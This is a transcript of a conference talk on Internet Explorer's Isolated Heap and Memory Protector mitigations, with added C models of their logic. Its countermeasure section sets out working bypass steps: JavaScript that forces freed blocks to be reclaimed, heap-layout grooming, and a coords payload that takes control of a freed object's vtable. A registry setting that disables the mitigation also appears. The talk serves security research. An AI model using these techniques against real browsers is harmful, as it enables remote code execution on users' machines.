New Exploit Mitigation In Internet Explorer - HITCON (hitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...)
TRANSCRIPT
![Page 1: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/1.jpg)
New Exploit Mitigation In Internet Explorer
HITCON X @K33nTeam @KeenTeam
@promised_lu

About Me
• Amateur browser exploiter
• Main work is writing fuzzers

Background

Internet Explorer Vulnerability Statistics

2013
• CVE-2013-0025 CParaElement Use-After-Free
• CVE-2013-1311 CDOMTextNode Use-After-Free
• CVE-2013-1347 CGenericElement Use-After-Free
• CVE-2013-2551 COALineDashStyleArray Integer Overflow (Pwn2Own)
• CVE-2013-3184 CFlatMarkupPointer Use-After-Free
• CVE-2013-3205 CCaret Use-After-Free
• CVE-2013-3893 CTreeNode Use-After-Free
• CVE-2013-3897 CDisplayPointer Use-After-Free

2013
• 129 CVEs
• Most of them are use-after-free bugs

2014
• CVE-2014-0322 CMarkup Use-After-Free
• CVE-2014-1776 CMarkup Use-After-Free

2014
• 135 CVEs from January to July
• Already more than in all of 2013

Exploit Mitigation
• Virtual Table Guard was introduced in Internet Explorer 10
• Anti-Use-After-Free

Virtual Table Guard

New Exploit Mitigation
• Isolated Heap was introduced in MS14-035
• Memory Protector was introduced in MS14-037
• Both cover Internet Explorer 6 through 11
• Anti-Use-After-Free

Agenda
• Isolated Heap
• Memory Protector
• Fuzzing Issues
• Countermeasures

Isolated Heap

g_hIsolatedHeap

```cpp
g_hIsolatedHeap = HeapCreate(0, 0, 0);
if (g_hIsolatedHeap) {
    ULONG HeapInformation = 2;   // HeapCompatibilityInformation = 2: enable the LFH
    HeapSetInformation(g_hIsolatedHeap, 0, &HeapInformation, sizeof(HeapInformation));
}
```

_MemIsolatedAlloc

```cpp
LPVOID __stdcall _MemIsolatedAlloc(SIZE_T dwBytes)
{
    if (!dwBytes)
        dwBytes = 1;
    return HeapAlloc(g_hIsolatedHeap, 0, dwBytes);
}
```

_MemIsolatedAllocClear

```cpp
LPVOID __stdcall _MemIsolatedAllocClear(SIZE_T dwBytes)
{
    return HeapAlloc(g_hIsolatedHeap, 8, dwBytes);   // 8 = HEAP_ZERO_MEMORY
}
```

_MemIsolatedFree

```cpp
void __stdcall _MemIsolatedFree(LPVOID lpMem)
{
    if (lpMem)
        MemoryProtection::HeapFree(g_hIsolatedHeap, 0, lpMem);
}
```

Internet Explorer 6

Isolated Objects
• All DOM objects
• Some render objects

How To Fill Isolated Objects In Use-After-Free
• BSTR: ✗
• String: ✗
• Struct: ✗
• Isolated object: ✓ (only another object allocated from the isolated heap can take the freed slot)

Memory Protector

SBlockDescriptor

```cpp
ULONG_PTR m_Block;   // address of heap block
SIZE_T    m_Size;    // size of heap block
```

SBlockDescriptorArray

```cpp
SBlockDescriptor *m_BlockDescriptors;   // array of heap blocks
SIZE_T            m_Size;               // total size of all heap blocks
ULONG             m_Count;              // count of heap blocks
```

MemoryProtection::HeapFree
• Replaces HeapFree throughout MSHTML

```cpp
BOOL __stdcall MemoryProtection::HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem)
{
    CMemoryProtector::ProtectedFree(hHeap, dwFlags, lpMem);
    return TRUE;
}
```

CMemoryProtector::ProtectedFree
• Reclaim memory
• Add the heap block to the SBlockDescriptorArray instead of freeing it

```cpp
static void __stdcall CMemoryProtector::ProtectedFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem)
{
    …
    MemoryProtector->ReclaimMemory((ULONG_PTR *)&lpMem, 100000);
    …
    // the block is queued rather than freed, and its contents are wiped
    if (MemoryProtector->AddBlockDescriptor((ULONG_PTR)lpMem, hHeap == g_hIsolatedHeap, &Size))
        memset(lpMem, 0, Size);
    …
}
```

CMemoryProtector::ReclaimMemory
• Does nothing while the total size of the SBlockDescriptorArray is less than 100000 bytes
• Marks blocks
• Reclaims unmarked blocks

```cpp
void CMemoryProtector::ReclaimMemory(ULONG_PTR *Blocks, UINT Size)
{
    if (GetCount() && (GetSize() >= Size || m_ForceReclaim)) {
        MarkBlocks(Blocks);
        ReclaimUnmarkedBlocks();
    }
}
```

CMemoryProtector::ReclaimMemory
Diagram: the thread stack (lpMem, RetAddr, …, Pointer, …) is read as an array of words and each word is compared against the blocks held in the SBlockDescriptorArray (Block 1 … Block N).

CMemoryProtector::MarkBlocks
• Traverses the thread stack as an array of pointers
• If a pointer points to a block in the SBlockDescriptorArray, that block is marked

```cpp
void CMemoryProtector::MarkBlocks(ULONG_PTR *Blocks)
{
    ULONG_PTR Low  = LowAddress();
    ULONG_PTR High = HighAddress();
    // Blocks is the address of lpMem on the stack; scan from there up to the stack top
    for (ULONG i = (m_StackHighAddress - (ULONG_PTR)Blocks) / sizeof(ULONG_PTR); i != 0; i--)
        MarkBlockForAddress(*Blocks++, Low, High);
}
```

CMemoryProtector::MarkBlocks
Diagram: the stack word labelled Pointer points at Block N, so Block N is marked; Block 1 and the other blocks stay unmarked.

CMemoryProtector::ReclaimUnmarkedBlocks
• Frees the unmarked blocks
• Unmarks the marked blocks

```cpp
void CMemoryProtector::ReclaimUnmarkedBlocks()
{
    for (ULONG i = 0; i < GetCount(); i++) {
        SBlockDescriptor *BlockDescriptor = GetBlockDescriptorAt(i);
        …
        if (BlockDescriptor->IsMarked())
            BlockDescriptor->Unmark();
        else
            ::HeapFree(hHeap, 0, (LPVOID)BlockDescriptor->BaseAddress());
        …
    }
}
```

CMemoryProtector::ReclaimUnmarkedBlocks
Diagram: after the sweep every unmarked block is freed; only Block N, which the stack word Pointer referenced, remains in the array.
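The four routines above (ProtectedFree, ReclaimMemory, MarkBlocks, ReclaimUnmarkedBlocks) condensed into a runnable C model. This is an added example, not code from the talk or from MSHTML: the size header in front of each allocation, the `fake_stack` array that stands in for the thread stack, the `really_freed` counter and the omission of `m_ForceReclaim` are modelling assumptions. It walks the same sequence the "Free Problem" slides later use: a block freed through ProtectedFree is wiped but not reusable, 250 × 400-byte frees push the array past the 100000-byte threshold, and the next free sweeps everything that no stack word points into.

```c
/* Added example: a small model of Memory Protector's delayed free (not MSHTML code). */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define MAX_BLOCKS        512       /* model limit (assumption) */
#define RECLAIM_THRESHOLD 100000u   /* the Size argument ProtectedFree passes to ReclaimMemory */

typedef struct {
    uintptr_t block;   /* SBlockDescriptor::m_Block */
    size_t    size;    /* SBlockDescriptor::m_Size  */
    int       marked;
} BlockDescriptor;

static struct {
    BlockDescriptor descs[MAX_BLOCKS];  /* SBlockDescriptorArray::m_BlockDescriptors */
    size_t   total_size;                /* m_Size: bytes waiting in the array */
    unsigned count;                     /* m_Count */
    size_t   really_freed;              /* assumption: blocks actually handed back to the allocator */
} g_mp;

/* Allocation with a size header in front (the real code asks the heap for the block size). */
void *mp_alloc(size_t n) {
    size_t *hdr = malloc(sizeof *hdr + n);
    if (!hdr) abort();
    *hdr = n;
    memset(hdr + 1, 0x41, n);           /* stand-in for live object data such as a vtable pointer */
    return hdr + 1;
}

/* MarkBlocks: walk the stack as an array of words; a word landing inside a queued block marks it. */
static void mark_blocks(const uintptr_t *stack, size_t nwords) {
    for (size_t w = 0; w < nwords; w++)
        for (unsigned i = 0; i < g_mp.count; i++)
            if (stack[w] >= g_mp.descs[i].block &&
                stack[w] <  g_mp.descs[i].block + g_mp.descs[i].size)
                g_mp.descs[i].marked = 1;
}

/* ReclaimUnmarkedBlocks: unreferenced blocks go back to the allocator, referenced ones are unmarked and kept. */
static void reclaim_unmarked_blocks(void) {
    unsigned kept = 0;
    for (unsigned i = 0; i < g_mp.count; i++) {
        BlockDescriptor d = g_mp.descs[i];
        if (d.marked) {
            d.marked = 0;
            g_mp.descs[kept++] = d;
        } else {
            free((size_t *)d.block - 1);
            g_mp.total_size -= d.size;
            g_mp.really_freed++;
        }
    }
    g_mp.count = kept;
}

/* ReclaimMemory: a no-op until the queued bytes reach the threshold. */
static void reclaim_memory(const uintptr_t *stack, size_t nwords) {
    if (g_mp.count && g_mp.total_size >= RECLAIM_THRESHOLD) {
        mark_blocks(stack, nwords);
        reclaim_unmarked_blocks();
    }
}

/* ProtectedFree: sweep old blocks first, then queue this one and wipe its contents. */
void mp_protected_free(void *p, const uintptr_t *stack, size_t nwords) {
    reclaim_memory(stack, nwords);
    if (g_mp.count == MAX_BLOCKS) abort();
    size_t n = ((size_t *)p)[-1];
    BlockDescriptor *d = &g_mp.descs[g_mp.count++];
    d->block = (uintptr_t)p; d->size = n; d->marked = 0;
    g_mp.total_size += n;
    memset(p, 0, n);   /* a dangling vtable pointer now reads as NULL rather than stale or attacker data */
}

unsigned mp_queued_count(void) { return g_mp.count; }
size_t   mp_really_freed(void) { return g_mp.really_freed; }

/* 1 while p sits in the descriptor array, i.e. its memory is not yet reusable by a spray. */
int mp_is_queued(const void *p) {
    for (unsigned i = 0; i < g_mp.count; i++)
        if (g_mp.descs[i].block == (uintptr_t)p) return 1;
    return 0;
}

/* The "Free Problem" sequence from the slides; returns the number of checks that held (9 when all do). */
int mp_scenario(void) {
    int ok = 0;
    uintptr_t fake_stack[4] = {0};      /* stands in for the thread stack MarkBlocks walks */
    memset(&g_mp, 0, sizeof g_mp);
    unsigned char *a = mp_alloc(0x50), *b = mp_alloc(0x50), *c = mp_alloc(0x50);

    mp_protected_free(a, fake_stack, 4);
    ok += (a[0] == 0);                  /* contents wiped ... */
    ok += mp_is_queued(a);              /* ... but the block is on no free list, so nothing can refill it */
    mp_protected_free(b, fake_stack, 4);
    ok += (mp_really_freed() == 0);     /* 0xa0 bytes queued, far below 100000 */

    fake_stack[1] = (uintptr_t)b + 8;   /* a local variable still pointing into b */
    for (int k = 0; k < 250; k++)       /* CollectGarbage2: 250 x 400-byte objects through ProtectedFree */
        mp_protected_free(mp_alloc(400), fake_stack, 4);
    ok += (mp_really_freed() == 0);     /* 100160 bytes queued now, but the sweep runs at the next free */

    mp_protected_free(c, fake_stack, 4);
    ok += !mp_is_queued(a);             /* nothing referenced a: really freed, refillable */
    ok += mp_is_queued(b);              /* referenced from the stack: survives the sweep */
    ok += mp_is_queued(c);              /* queued after the sweep */
    ok += (mp_really_freed() == 251);   /* a plus the 250 video stand-ins */
    ok += (mp_queued_count() == 2);
    return ok;
}
```

The sweep runs on the free that crosses the threshold, not on the one that reaches it, which is why the exploit on the later slides frees one more batch after the dangling object; the `b` block shows the "never use-after-free" case, where a pointer still on the stack keeps the block alive and zeroed for as long as that frame exists.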

Visual Studio Port
• https://github.com/promised-lu/MemoryProtection

Delay Free Or Never Use-After-Free
• Either way the freed object cannot be refilled by the exploit

Fuzzing Issues

Isolated Heap
• The Isolated Heap reduces the probability of hitting a use-after-free if PageHeap is turned off
• Patch g_hIsolatedHeap to the process heap

Memory Protector
• Memory Protector sharply reduces the probability of hitting a use-after-free
• Patch the memset in CMemoryProtector::ProtectedFree (it is inlined, so there is no single call site)
• Turn off Memory Protector through the registry:

```reg
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MEMPROTECT_MODE]
"iexplore.exe"=dword:00000000
```

Countermeasures

Free Problem
• Fill the SBlockDescriptorArray to trigger ReclaimUnmarkedBlocks
• Windows 7 x86
• Internet Explorer 11

CollectGarbage2

```javascript
function CollectGarbage2() {
    var video = new Array();
    for (var i = 0; i < 250; i++) {
        video[i] = document.createElement("video"); // 400 bytes each: 250 * 400 = 100000 bytes
    }
    video = null;
    CollectGarbage(); // the video elements go through ProtectedFree, the array crosses
                      // the 100000-byte threshold and ReclaimUnmarkedBlocks runs
}
```

Delay Free Situation ☺

```javascript
// Free the Use-After-Free object
// (the Use-After-Free object is not referred to from the stack)
CollectGarbage2(); // the Use-After-Free object is now freed for real
// Fill the Use-After-Free object
// Use the Use-After-Free object
```

Never Use-After-Free Situation ☹

```javascript
// Trigger event
//     // inside the event handler:
//     // Free the Use-After-Free object
//     // (the Use-After-Free object is still referred to from the stack)
// Use the Use-After-Free object
// Cannot fill the Use-After-Free object: it was never really freed, only zeroed
```

Case By Case
• Many paths can trigger the same use-after-free
• Which situation you land in is hard to say in advance

Fill Problem
• Manipulate the LFH
• Windows 7 x86
• Internet Explorer 11

Step 1

```html
<!DOCTYPE html>
<html>
<head>
<script>
function load() {
    // Step 1
    …
}
</script>
</head>
<body onload="load()"></body>
</html>
```

Step 1

```text
0:007> !heap -p -h poi(MSHTML!g_hIsolatedHeap)
    _HEAP @ 3ac0000
      _LFH_HEAP @ 3ac44f0
      _HEAP_SEGMENT @ 3ac0000
        CommittedRange @ 3ac0588
          HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
          …
          03ad5130 003b 0086  [00]   03ad5138    001d0 - (busy)
            MSHTML!CWindow::`vftable'
          …
      VirtualAllocdBlocks @ 3ac00a0
```

Step 2

```javascript
var Bucket1 = new Array(); // enable the LFH for the COptionElement bucket
for (var i = 0; i < 0x11; i++) {
    Bucket1[i] = document.createElement("option");
}
// one UserBlock holds floor((0x1000 - 0x8 - 0x10) / (0x50 + 0x8)) = 46 COptionElements
var UserBlocks1 = new Array();
for (var i = 0; i < Math.floor((0x1000 - 0x8 - 0x10) / (0x50 + 0x8)); i++) {
    UserBlocks1[i] = document.createElement("option");
}
var UserBlocks2 = new Array();
for (var i = 0; i < Math.floor((0x1000 - 0x8 - 0x10) / (0x50 + 0x8)); i++) {
    UserBlocks2[i] = document.createElement("option");
}
```

Step 2

```text
0:007> !heap -p -h poi(MSHTML!g_hIsolatedHeap)
    …
  * 03ad6650 0200 000b  [00]   03ad6658    00ff8 - (busy)   // UserBlocks1
      03ad6668 000b 0200  [00]   03ad6670    0004c - (busy)
        MSHTML!COptionElement::`vftable'
    …
  * 03ad7a50 0200 0080  [00]   03ad7a58    00ff8 - (busy)   // UserBlocks2
      03ad7a68 000b 0200  [00]   03ad7a70    0004c - (busy)
        MSHTML!COptionElement::`vftable'
    …
      VirtualAllocdBlocks @ 3ac00a0
```

Step 3

```javascript
UserBlocks1 = null;
CollectGarbage();
CollectGarbage2();
```

Step 3

```text
0:007> !heap -p -h poi(MSHTML!g_hIsolatedHeap)
    …
  * 03ad6650 0200 000b  [00]   03ad6658    00ff8 - (busy)   // UserBlocks1
    …
  * 03ad7a50 0200 0080  [00]   03ad7a58    00ff8 - (busy)   // UserBlocks2
      03ad7a68 000b 0200  [00]   03ad7a70    0004c - (busy)
        MSHTML!COptionElement::`vftable'
    …
      VirtualAllocdBlocks @ 3ac00a0
```

The UserBlocks1 subsegment no longer lists any busy COptionElement: once ReclaimUnmarkedBlocks ran, the option elements were actually released.

Step 4

```javascript
var Bucket2 = new Array(); // enable the LFH for the CAreaElement bucket
for (var i = 0; i < 0x11; i++) {
    Bucket2[i] = document.createElement("area");
}
// one UserBlock holds floor((0x1000 - 0x8 - 0x10) / (0x68 + 0x8)) = 36 CAreaElements
var UserBlocks1 = new Array();
for (var i = 0; i < Math.floor((0x1000 - 0x8 - 0x10) / (0x68 + 0x8)); i++) {
    UserBlocks1[i] = document.createElement("area");
}
```

Step 4

```text
0:007> !heap -p -h poi(MSHTML!g_hIsolatedHeap)
    …
  * 03ad6650 0200 000b  [00]   03ad6658    00ff8 - (busy)   // UserBlocks1
      03ad6668 000e 0200  [00]   03ad6670    00064 - (busy)
        MSHTML!CAreaElement::`vftable'
    …
  * 03ad7a50 0200 0080  [00]   03ad7a58    00ff8 - (busy)   // UserBlocks2
      03ad7a68 000b 0200  [00]   03ad7a70    0004c - (busy)
        MSHTML!COptionElement::`vftable'
    …
      VirtualAllocdBlocks @ 3ac00a0
```

The 0x1000-byte UserBlock that held UserBlocks1 has been handed to the CAreaElement bucket, so the new CAreaElements overlay the addresses where the freed COptionElements lived.

CAreaElement
• 0x64 bytes
• +0x4c RECT
  • +0x4c left
  • +0x50 top
  • +0x54 right
  • +0x58 bottom

CAreaElement
• shape = "rect"
• coords = "1,2,3,4"
• gives +0x4c 1, +0x50 2, +0x54 3, +0x58 4: the four coordinates are written straight into the RECT

Control vtable of COptionElement

```javascript
var i; // index of the Use-After-Free COptionElement
var j; // index of the corresponding CAreaElement
for (i = 0; i < Math.floor((0x1000 - 0x8 - 0x10) / (0x50 + 0x8)); i++) {
    // 0x0 is the offset of the vtable pointer inside COptionElement
    var r = ((0x50 + 0x8) * i + 0x0) % (0x68 + 0x8);
    j = Math.floor(((0x50 + 0x8) * i + 0x0) / (0x68 + 0x8));
    if (r >= 0x4c && r <= 0x58) break; // the vtable slot falls inside the RECT
}
// i = 1
// j = 0
```

New Step 2

```javascript
…
var UserBlocks1 = new Array();
for (var i = 0; i < Math.floor((0x1000 - 0x8 - 0x10) / (0x50 + 0x8)); i++) {
    if (i == 1) {
        // Create the Use-After-Free COptionElement
    }
    UserBlocks1[i] = document.createElement("option");
}
…
```

New Step 3

```javascript
// Free the Use-After-Free COptionElement
for (var i = 0; i < Math.floor((0x1000 - 0x8 - 0x10) / (0x50 + 0x8)); i++) {
    if (i != 1) UserBlocks1[i] = null;
}
CollectGarbage();
CollectGarbage2();
```

New Step 5

```javascript
UserBlocks1[0].shape = "rect";
UserBlocks1[0].coords = "1,2,3,83886116"; // 83886116 = 0x05000024 => vtable of the Use-After-Free COptionElement
```
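The arithmetic behind "Control vtable of COptionElement" and the coords payload on the last step, generalised to any victim/filler pair of LFH buckets. This is an added example, not code from the talk: it reproduces the slides' model of a Windows 7 x86 LFH UserBlock (one 0x1000 page, 0x8 bytes of chunk header, 0x10 bytes of subsegment header, victim chunk i at page offset `(victim size + 0x8) * i`), and the `Overlap` type, `find_overlap`, `format_coords` and the assumption that coords are parsed as signed 32-bit integers are mine.

```c
/* Added example (not code from the talk): which filler object covers the victim's vtable slot? */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define LFH_USERBLOCK_BYTES 0x1000u
#define LFH_CHUNK_HEADER    0x8u
#define LFH_SUBSEG_HEADER   0x10u

typedef struct {
    int found;                 /* 1 if some victim chunk's target field lands in the controlled window */
    unsigned i;                /* index of the victim object (the one to make dangle) */
    unsigned j;                /* index of the filler object that now covers its target field */
    unsigned offset_in_filler; /* byte offset of the target field inside filler j */
    unsigned field_index;      /* which 4-byte slot of the controlled window that is */
} Overlap;

/* Objects per UserBlock, as computed on the slides: floor((0x1000 - 0x8 - 0x10) / (size + 0x8)). */
unsigned chunks_per_userblock(unsigned object_size) {
    return (LFH_USERBLOCK_BYTES - LFH_CHUNK_HEADER - LFH_SUBSEG_HEADER)
         / (object_size + LFH_CHUNK_HEADER);
}

/*
 * victim_size: size of the freed object            (COptionElement: 0x50)
 * filler_size: size of the replacement object      (CAreaElement: 0x68, i.e. a 0x70 chunk)
 * target_off:  offset of the field to control in the victim (vtable pointer: 0x0)
 * ctrl_lo/hi:  first/last byte offset of attacker-writable data in the filler (RECT: 0x4c..0x58)
 */
Overlap find_overlap(unsigned victim_size, unsigned filler_size, unsigned target_off,
                     unsigned ctrl_lo, unsigned ctrl_hi) {
    Overlap r = {0, 0, 0, 0, 0};
    unsigned vchunk  = victim_size + LFH_CHUNK_HEADER;
    unsigned fchunk  = filler_size + LFH_CHUNK_HEADER;
    unsigned nvictim = chunks_per_userblock(victim_size);
    unsigned nfiller = chunks_per_userblock(filler_size);

    for (unsigned i = 0; i < nvictim; i++) {
        unsigned off = vchunk * i + target_off;   /* page offset of victim i's target field */
        unsigned j   = off / fchunk;              /* filler object sitting on that offset */
        unsigned rem = off % fchunk;              /* and where inside it the field lands */
        if (j >= nfiller) break;                  /* beyond the last filler object on the page */
        if (rem >= ctrl_lo && rem <= ctrl_hi) {
            r.found = 1; r.i = i; r.j = j;
            r.offset_in_filler = rem;
            r.field_index = (rem - ctrl_lo) / 4;
            break;
        }
    }
    return r;
}

/* Build the coords string that writes `value` into RECT slot `field_index`; the other slots keep 1,2,3,4. */
int format_coords(char *buf, size_t buflen, unsigned field_index, uint32_t value) {
    /* Assumption: coords are parsed as 32-bit signed integers, so the value is emitted as a signed decimal. */
    int32_t slots[4] = {1, 2, 3, 4};
    if (field_index > 3) return -1;
    slots[field_index] = (int32_t)value;
    return snprintf(buf, buflen, "%d,%d,%d,%d", slots[0], slots[1], slots[2], slots[3]);
}

/* The slides' concrete case; returns the number of checks that held (4 when all do). */
int overlap_demo(void) {
    char coords[64];
    int ok = 0;
    Overlap o = find_overlap(0x50, 0x68, 0x0, 0x4c, 0x58);
    ok += (o.found && o.i == 1 && o.j == 0);                   /* victim option[1] lies under area[0] */
    ok += (o.offset_in_filler == 0x58 && o.field_index == 3);  /* at RECT.bottom, the 4th coordinate */
    ok += (format_coords(coords, sizeof coords, o.field_index, 0x05000024u) > 0);
    ok += (strcmp(coords, "1,2,3,83886116") == 0);             /* the string on the last slide */
    return ok;
}
```

Option index 0 is skipped by the window check for a reason: its vtable sits at page offset 0, which is the filler's own vtable slot, not attacker data. The search therefore stops at index 1, whose vtable slot falls 0x58 bytes into the first CAreaElement, and `format_coords` turns that slot into the coords string used in New Step 5.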

Thanks
Liang Chen, wu shi, humeafo